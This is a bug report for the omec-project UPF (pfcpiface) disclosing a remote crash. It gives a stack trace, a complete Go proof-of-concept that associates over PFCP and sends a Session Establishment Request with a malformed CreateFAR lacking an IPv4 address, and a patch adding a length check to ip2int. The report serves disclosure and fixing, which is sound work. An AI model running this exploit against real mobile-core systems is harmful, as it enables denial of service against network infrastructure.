[Bug] UPF crash on malformed FAR (emptyIP) in Session Establishment Request

# Describe the bug
After association completes, a crafted Session Establishment Request whose CreateFAR contains an empty/truncated IPv4 address field triggers an out-of-bounds read in ip2int (parse_far.go:123 → utils.go:67 → encoding/binary/binary.go:177), triggering the UPF crash and leading to DoS

# Release Information
Component: UPF (pfcpiface)
Version: upf-epc-pfcpiface:2.1.3-dev

# Logs
```
2025-11-12T05:25:50.398Z        INFO    pfcpiface/conn.go:121   created PFCPConn from: 172.17.0.3:8805 to: 172.17.0.1:57875       {"component": "UPF", "category": "Pfcp"}
2025-11-12T05:25:50.398Z        INFO    pfcpiface/messages_conn.go:99   association Setup with DNN: internet    {"component": "UPF", "category": "Pfcp"}
2025-11-12T05:25:50.398Z        INFO    pfcpiface/messages_conn.go:159  association Setup Request from 172.17.0.1:57875 with recovery timestamp: 2025-11-12 05:25:50 +0000 UTC    {"component": "UPF", "category": "Pfcp"}
2025-11-12T05:25:50.398Z        INFO    pfcpiface/messages_conn.go:171  association setup done between nodes local: 172.17.0.3 remote: 172.17.0.1 {"component": "UPF", "category": "Pfcp"}
panic: runtime error: index out of range [3] with length 0

goroutine 28 [running]:
encoding/binary.bigEndian.Uint32(...)
        /usr/local/go/src/encoding/binary/binary.go:177
github.com/omec-project/upf-epc/pfcpiface.ip2int(...)
        /pfcpiface/pfcpiface/utils.go:72
github.com/omec-project/upf-epc/pfcpiface.(*far).parseFAR(0xc0000b08b0, 0xc00013d380, 0xc0003d67e0?, 0xc00015c120, 0x0)
        /pfcpiface/pfcpiface/parse_far.go:123 +0x529
github.com/omec-project/upf-epc/pfcpiface.(*PFCPConn).handleSessionEstablishmentRequest(0xc0004745a0, {0xdc15c0?, 0xc000141a40})
        /pfcpiface/pfcpiface/messages_session.go:114 +0xffd
github.com/omec-project/upf-epc/pfcpiface.(*PFCPConn).HandlePFCPMsg(0xc0004745a0, {0xc0003ee000, 0x9a, 0xa0})
        /pfcpiface/pfcpiface/messages.go:120 +0x814
github.com/omec-project/upf-epc/pfcpiface.(*PFCPConn).Serve.func1(0xc0002c4af0)
        /pfcpiface/pfcpiface/conn.go:211 +0x1c5
created by github.com/omec-project/upf-epc/pfcpiface.(*PFCPConn).Serve in goroutine 27
        /pfcpiface/pfcpiface/conn.go:184 +0xc9
```
# Steps to reproduce the behavior:

1. Start a new go project inside a new folder and create a main.go and paste the code below:
2.  Init Project `go mod init poc` 
```
package main

import (
	"errors"
	"flag"
	"fmt"
	"log"
	"net"
	"time"

	"github.com/wmnsk/go-pfcp/ie"
	"github.com/wmnsk/go-pfcp/message"
)

const (
	modeSessionFAROuterHeaderNil = "session-far-outer-header-nil"
	defaultCPSEID                = 0x1111222233334444
	heartbeatResponseBufferSize  = 4096
	defaultWaitForResponse       = 5 * time.Second
	defaultAssociationRetrySleep = 200 * time.Millisecond
)

type seqGenerator struct {
	val uint32
}

func (g *seqGenerator) Next() uint32 {
	g.val++
	if g.val == 0 || g.val > 0xFFFFFF {
		g.val = 1
	}
	return g.val
}

func forcePFCPv1(pkt []byte) {
	if len(pkt) > 0 {
		pkt[0] = (1 << 5) | (pkt[0] & 0x1F)
	}
}

func startReceiver(conn *net.UDPConn) (chan message.Message, chan error, func()) {
	msgCh := make(chan message.Message, 16)
	errCh := make(chan error, 1)
	stop := make(chan struct{})

	go func() {
		defer close(msgCh)
		defer close(errCh)

		buf := make([]byte, heartbeatResponseBufferSize)
		for {
			conn.SetReadDeadline(time.Now().Add(1 * time.Second))
			n, _, err := conn.ReadFromUDP(buf)
			if ne, ok := err.(net.Error); ok && ne.Timeout() {
				select {
				case <-stop:
					return
				default:
				}
				continue
			}
			if err != nil {
				select {
				case errCh <- err:
				default:
				}
				return
			}

			payload := make([]byte, n)
			copy(payload, buf[:n])
			msg, err := message.Parse(payload)
			if err != nil {
				log.Printf("[rx] failed to parse PFCP message: %v", err)
				continue
			}

			switch msgTyped := msg.(type) {
			case *message.HeartbeatRequest:
				seq := msgTyped.Sequence()
				rsp := message.NewHeartbeatResponse(seq, ie.NewRecoveryTimeStamp(time.Now()))
				raw, err := rsp.Marshal()
				if err != nil {
					log.Printf("[rx] failed to marshal Heartbeat Response: %v", err)
					continue
				}
				forcePFCPv1(raw)
				if _, err := conn.Write(raw); err != nil {
					log.Printf("[rx] failed to send Heartbeat Response: %v", err)
				} else {
					log.Printf("[rx] ← Heartbeat Request (seq=%d) → responded", seq)
				}
			default:
				select {
				case msgCh <- msg:
					log.Printf("[rx] ← %s (type=%d, seq=%d)", msg.MessageTypeName(), msg.MessageType(), msg.Sequence())
				default:
					log.Printf("[rx] dropping %s: channel full", msg.MessageTypeName())
				}
			}

			select {
			case <-stop:
				return
			default:
			}
		}
	}()

	cancel := func() {
		close(stop)
	}

	return msgCh, errCh, cancel
}

func waitForMessage(msgCh <-chan message.Message, errCh <-chan error, timeout time.Duration, match func(message.Message) bool, description string) (message.Message, error) {
	timer := time.NewTimer(timeout)
	defer timer.Stop()

	for {
		select {
		case <-timer.C:
			return nil, fmt.Errorf("timeout waiting for %s", description)
		case err, ok := <-errCh:
			if ok && err != nil {
				return nil, fmt.Errorf("receiver error: %w", err)
			}
		case msg, ok := <-msgCh:
			if !ok {
				return nil, fmt.Errorf("receiver closed while waiting for %s", description)
			}
			if match(msg) {
				return msg, nil
			}
			log.Printf("[wait] ignoring unexpected message: %s (type=%d, seq=%d)", msg.MessageTypeName(), msg.MessageType(), msg.Sequence())
		}
	}
}

func performAssociation(conn *net.UDPConn, seqGen *seqGenerator, msgCh <-chan message.Message, errCh <-chan error, nodeID string, includeUPFInfo bool) error {
	nodeIE := ie.NewNodeID(nodeID, "", "")
	if nodeIE == nil {
		return errors.New("failed to build NodeID IE – ensure --bind is a valid IP or FQDN")
	}

	ies := []*ie.IE{
		nodeIE,
		ie.NewRecoveryTimeStamp(time.Now()),
	}
	if includeUPFInfo {
		ies = append(ies,
			ie.NewUPFunctionFeatures(0x10, 0x00, 0x00, 0x00),
			ie.NewUserPlaneIPResourceInformation(0x41, 0, nodeID, "", "", ie.SrcInterfaceAccess),
		)
	}

	assocSeq := seqGen.Next()
	req := message.NewAssociationSetupRequest(assocSeq, ies...)

	raw, err := req.Marshal()
	if err != nil {
		return fmt.Errorf("marshal association request: %w", err)
	}
	forcePFCPv1(raw)

	log.Printf("[assoc] → Association Setup Request (seq=%d)", assocSeq)
	if _, err := conn.Write(raw); err != nil {
		return fmt.Errorf("send association request: %w", err)
	}

	_, err = waitForMessage(msgCh, errCh, defaultWaitForResponse, func(m message.Message) bool {
		_, ok := m.(*message.AssociationSetupResponse)
		return ok
	}, "Association Setup Response")
	if err != nil {
		return fmt.Errorf("association failed: %w", err)
	}

	log.Printf("[assoc] Association established; ready for exploit traffic.")
	return nil
}

// sendSessionFAROuterHeaderNil sends a Session Establishment Request with malformed OuterHeaderCreation
// This attempts to trigger nil pointer dereference in parseFAR at parse_far.go:122-123
// Note: This may not actually trigger a crash as go-pfcp library should handle errors properly
func sendSessionFAROuterHeaderNil(conn *net.UDPConn, seqGen *seqGenerator, localIP net.IP, nodeID string, dnn string) error {
	nodeIE := ie.NewNodeID(nodeID, "", "")
	if nodeIE == nil {
		return errors.New("unable to craft NodeID IE; supply --bind as valid IP or FQDN")
	}

	fseidIE := ie.NewFSEID(defaultCPSEID, localIP, nil)
	if fseidIE == nil {
		return errors.New("failed to craft F-SEID IE")
	}

	pdi := ie.NewPDI(
		ie.NewSourceInterface(ie.SrcInterfaceAccess),
		ie.NewNetworkInstance(dnn),
	)

	createPDR := ie.NewCreatePDR(
		ie.NewPDRID(1),
		ie.NewPrecedence(200),
		pdi,
		ie.NewFARID(1),
	)

	// Create FAR with ForwardingParameters containing OuterHeaderCreation
	// The vulnerability occurs when OuterHeaderCreation contains only IPv6 (no IPv4)
	// In this case, ohcFields.IPv4Address will be nil, causing panic in ip2int()
	// OuterHeaderCreation flags (high byte controls field presence):
	// - 0x0200 = only bit 1 (0x02) set
	//   - TEID: has2ndBit(0x02) = true ✓
	//   - IPv4: has1stBit(0x02) = false, has3rdBit(0x02) = false, has5thBit(0x02) = false ✗
	//   - IPv6: has2ndBit(0x02) = true ✓
	// - This creates an OuterHeaderCreation with TEID and IPv6, but NO IPv4
	// - When UPF calls ip2int(ohcFields.IPv4Address), IPv4Address is nil -> panic
	// - Even though UPF uses go-pfcp library, parsing this will result in IPv4Address = nil
	outerHeaderIE := ie.NewOuterHeaderCreation(0x0200, 100, "", "2001:db8::1", 0, 0, 0)
	if outerHeaderIE == nil {
		return errors.New("failed to craft OuterHeaderCreation IE")
	}

	createFAR := ie.NewCreateFAR(
		ie.NewFARID(1),
		ie.NewApplyAction(0x02), // Forward action
		ie.NewForwardingParameters(
			ie.NewDestinationInterface(ie.DstInterfaceCore),
			outerHeaderIE,
		),
	)

	req := message.NewSessionEstablishmentRequest(0, 0, defaultCPSEID, seqGen.Next(), 0,
		nodeIE,
		fseidIE,
		createPDR,
		createFAR,
		ie.NewAPNDNN(dnn),
	)

	raw, err := req.Marshal()
	if err != nil {
		return fmt.Errorf("marshal session establishment request (FAR OuterHeaderCreation): %w", err)
	}
	forcePFCPv1(raw)

	log.Printf("[poc] → Session Establishment Request (seq=%d, FAR with OuterHeaderCreation IPv6 only)", req.Sequence())
	log.Printf("[poc]   Creates FAR with ForwardingParameters containing OuterHeaderCreation")
	log.Printf("[poc]   OuterHeaderCreation flags: 0x0200 (TEID + IPv6 present, no IPv4)")
	log.Printf("[poc]   Note: Even with go-pfcp library, parsing this results in IPv4Address = nil")
	log.Printf("[poc]   This triggers nil pointer dereference in parseFAR at parse_far.go:123")
	log.Printf("[poc]   when accessing ohcFields.IPv4Address in ip2int() call (IPv4Address is nil)")
	_, err = conn.Write(raw)
	if err != nil {
		return fmt.Errorf("failed to send session establishment request: %w", err)
	}
	log.Printf("[poc]   Message sent successfully. Check UPF logs for processing results.")
	return nil
}

func main() {
	mode := flag.String("mode", modeSessionFAROuterHeaderNil, "POC attack mode")
	host := flag.String("host", "127.0.0.1", "UPF PFCP address")
	port := flag.Int("port", 8805, "UPF PFCP port")
	bind := flag.String("bind", "127.0.0.2", "local source IP (attacker PFCP address)")
	dnn := flag.String("dnn", "internet", "DNN to include when crafting valid PDRs")
	wait := flag.Duration("wait", defaultAssociationRetrySleep, "delay between association and exploit payload")
	flag.Parse()

	remoteAddr, err := net.ResolveUDPAddr("udp", fmt.Sprintf("%s:%d", *host, *port))
	if err != nil {
		log.Fatalf("resolve remote: %v", err)
	}

	localIP := net.ParseIP(*bind)
	if localIP == nil {
		log.Fatalf("invalid bind IP: %s", *bind)
	}
	localAddr := &net.UDPAddr{IP: localIP, Port: 0}

	conn, err := net.DialUDP("udp", localAddr, remoteAddr)
	if err != nil {
		log.Fatalf("dial udp: %v", err)
	}
	defer conn.Close()

	msgCh, errCh, cancel := startReceiver(conn)
	defer cancel()

	seqGen := &seqGenerator{}

	log.Printf("Remote UPF target: %s", remoteAddr.String())
	log.Printf("Local PFCP source: %s", conn.LocalAddr().String())
	log.Printf("Running mode: %s", *mode)
	log.Printf("")

	switch *mode {
	case modeSessionFAROuterHeaderNil:
		if err := performAssociation(conn, seqGen, msgCh, errCh, *bind, true); err != nil {
			log.Fatalf("association handshake failed: %v", err)
		}
		time.Sleep(*wait)
		if err := sendSessionFAROuterHeaderNil(conn, seqGen, localIP, *bind, *dnn); err != nil {
			log.Fatalf("send session establishment request (FAR OuterHeaderCreation): %v", err)
		}
	default:
		log.Fatalf("unknown mode: %s", *mode)
	}

	log.Printf("")
	log.Printf("Payload delivered. Observe UPF logs for panic stack traces.")
}
```
3. Download required libraries: `go mod tidy`
4. Run the program with the UPF PFCP server address: `go run ./main.go -mode session-far-outer-header-nil -host 172.17.0.3 -port 8805 -bind 172.17.0.1 -dnn internet`

# Expected behavior
Validate IP-bearing fields in CreateFAR (e.g., IPv4) and reject/ignore malformed or empty values, replying with a Session Establishment Response and an appropriate Cause.
# Observed behavior
On receiving a Session Establishment Request whose CreateFAR contains an empty IPv4, UPF crashes.

--- a/pfcpiface/utils.go
+++ b/pfcpiface/utils.go
@@ -65,10 +65,13 @@ func inc(ip net.IP) {
 }
 
 func ip2int(ip net.IP) uint32 {
+	// Guard against IP with insufficient length (need at least 4 bytes for uint32)
+	if len(ip) < 4 {
+		return 0
+	}
 	if len(ip) == 16 {
 		return binary.BigEndian.Uint32(ip[12:16])
 	}
-
 	return binary.BigEndian.Uint32(ip)
 }
 

